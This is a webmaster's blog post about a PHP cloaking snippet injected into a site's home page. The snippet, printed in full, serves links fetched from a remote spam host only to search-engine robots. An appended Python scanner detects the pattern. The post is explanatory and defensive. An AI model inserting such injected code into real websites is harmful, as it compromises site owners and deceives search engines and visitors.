New Web Site Hack!


I just "discovered" someone had embedded some PHP code on the home page of one of my web sites which redirected search engine robots to a page full of "links".

I'm not quite sure "how" it got inserted onto the bottom of this home page, but its intent is fairly obvious.

This little piece of PHP scripting:

    // Read the visitor's User-Agent header
    $HTTP_USER_AGENT=$_SERVER["HTTP_USER_AGENT"];
    // Only run for the listed search engine robots
    if (strstr($HTTP_USER_AGENT,"Googlebot") or
        strstr($HTTP_USER_AGENT,"msnbot") or
        strstr($HTTP_USER_AGENT,"Slurp") or
        strstr($HTTP_USER_AGENT,"Yahoo") or
        strstr($HTTP_USER_AGENT,"ZyBorg") or
        strstr($HTTP_USER_AGENT,"Jeeves")){
        // Fetch the remote page and output it as part of this page
        $strget=file_get_contents("http://srv1.searchingwww.net/allrandom.php");
        echo $strget;
    }

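is designed to "grab" search engine robots and redirect them to the content at http://srv1.searchingwww.net/allrandom.php: when the visitor's user agent matches one of the listed robots, the script fetches that URL and echoes the result into the page.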

So what happens when they get there?

Well if you were to look yourself, you'd see nothing unless you look at the actual HTML coding... And then you'd see a whole list of randomly generated URLs which point to keyword spam sites organised by these filthy people.

URLs to sites that capitalise on Adsense clicks and other affiliate programs that these slime are members of!

These URLs are hidden in a 1x1 pixel marquee which looks like this (I've actually substituted my OWN URLs here to get some linking benefit from it!):

small business | australian domain names | aussie web directory | positions vacant

The main purpose of such an exploit seems to be to:

  • get search engines to go to these dubious links from your page, and
  • possibly transfer some of your page rank to these spam sites.

Fortunately, this hack had no effect on my site - because my page wasn't in PHP, the robots would not have been able to follow the link in the script.

But...

There are several reasons why you should be worried about such an exploit!

  1. Someone has hacked into your home page in the first place. It wasn't something you would even notice unless you actually examined your HTML code.

  2. Your site might be penalised or even banned by search engines for associating with "bad neighbourhoods" - i.e. pointing to these keyword spam sites.

  3. A variation of this type of script could have resulted in your site being the source of an uninvited spyware download onto your visitors' computers.

So now there's something else you have to look out for!
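
One way to look out for it, as an added example (not code from the original article): a small Python scanner that flags web files combining a search-robot user-agent check with a fetch of a remote URL, the two halves of the snippet above. The function names, the extension list and the two sample pages are assumptions constructed for illustration; the robot names and the URL are the ones shown on this page.

```python
import re
from pathlib import Path

# Crawler names tested by the injected snippet shown on this page.
BOT_NAMES = ("Googlebot", "msnbot", "Slurp", "Yahoo", "ZyBorg", "Jeeves")
UA_REF = re.compile(r"HTTP_USER_AGENT", re.I)
# PHP calls that can pull content from a remote URL given as a string literal.
REMOTE_FETCH = re.compile(
    r"(?:file_get_contents|fopen|readfile|curl_init|(?:include|require)(?:_once)?)"
    r"\s*\(?\s*[\"'](https?://[^\"']+)", re.I)
# Static pages are included: the snippet here was appended to a non-PHP home page.
WEB_EXTS = {".php", ".phtml", ".inc", ".html", ".htm"}

def inspect_source(text):
    """Classify one file's text as 'cloaking', 'review' or 'clean'."""
    lowered = text.lower()
    bots = [b for b in BOT_NAMES if b.lower() in lowered]
    urls = REMOTE_FETCH.findall(text)
    ua_branch = bool(UA_REF.search(text)) and bool(bots)
    if ua_branch and urls:
        verdict = "cloaking"   # robot-only branch plus a remote fetch
    elif ua_branch or urls:
        verdict = "review"     # one half of the pattern; needs a human look
    else:
        verdict = "clean"
    return {"verdict": verdict, "bots": bots, "remote_urls": urls}

def scan_tree(root):
    """Return {relative_path: result} for every web file that is not 'clean'."""
    hits = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in WEB_EXTS:
            result = inspect_source(path.read_text(errors="replace"))
            if result["verdict"] != "clean":
                hits[str(path.relative_to(root))] = result
    return hits

# Constructed sample: a static home page with the page's snippet appended.
SAMPLE_INJECTED = """<html><body><h1>Welcome</h1></body></html>
<?php $HTTP_USER_AGENT=$_SERVER["HTTP_USER_AGENT"];
if (strstr($HTTP_USER_AGENT,"Googlebot") or strstr($HTTP_USER_AGENT,"Slurp")){
$strget=file_get_contents("http://srv1.searchingwww.net/allrandom.php");
echo $strget; } ?>"""
# Constructed sample: an ordinary page that merely links to a search engine.
SAMPLE_CLEAN = '<html><body><a href="http://www.yahoo.com/">Yahoo</a></body></html>'

if __name__ == "__main__":
    print(inspect_source(SAMPLE_INJECTED))
    print(inspect_source(SAMPLE_CLEAN))
```

Run scan_tree() against a copy of the web root; a "review" result is not proof of compromise, since legitimate PHP also fetches remote URLs.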

Regards
Stephen Spry
SBSN Webmaster

Author Credits ::

This item was originally published in 2007... but this is STILL very much a common problem today!